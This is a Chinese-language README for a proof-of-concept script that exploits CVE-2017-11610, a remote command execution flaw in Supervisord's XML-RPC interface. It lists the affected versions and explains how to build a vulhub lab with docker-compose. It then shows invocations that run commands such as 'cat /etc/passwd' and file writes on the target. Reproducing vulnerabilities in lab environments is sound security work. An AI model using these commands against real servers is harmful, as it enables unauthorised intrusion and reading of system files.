CVE-2017-11610.md

CVE-2017-11610 Supervisord 远程命令执行漏洞

影响版本：Supervisor 3.1.2 <= Version <= 3.3.2

已修复版本：Supervisor 3.3.3、Supervisor 3.2.4、Superivsor 3.1.4、Supervisor 3.0.1

最好用vulhub的靶机环境复现

build test env

条件：已安装docker + docker-compose

下载 https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 中的文件到本地目录

然后执行下列命令构建环境：

docker-compose build
docker-compose up -d

环境启动后，访问http://your-ip:9001即可查看Supervisord的页面。

usage

poc test

python3 CVE-2017-11610.py "http://10.0.4.148:9001/RPC2" "pwd"
python CVE-2017-11610.py "http://10.0.4.148:9001/RPC2" "whoami"
python CVE-2017-11610.py "http://10.0.4.148:9001/RPC2" "cat /etc/passwd"

write file test

python CVE-2017-11610.py "http://10.0.4.148:9001/RPC2" "touch /tmp/yl"
python CVE-2017-11610.py "http://10.0.4.148:9001/RPC2" "ls /tmp/"

ref

• https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
• https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
• http://blog.nsfocus.net/supervisord-cve-2017-11610/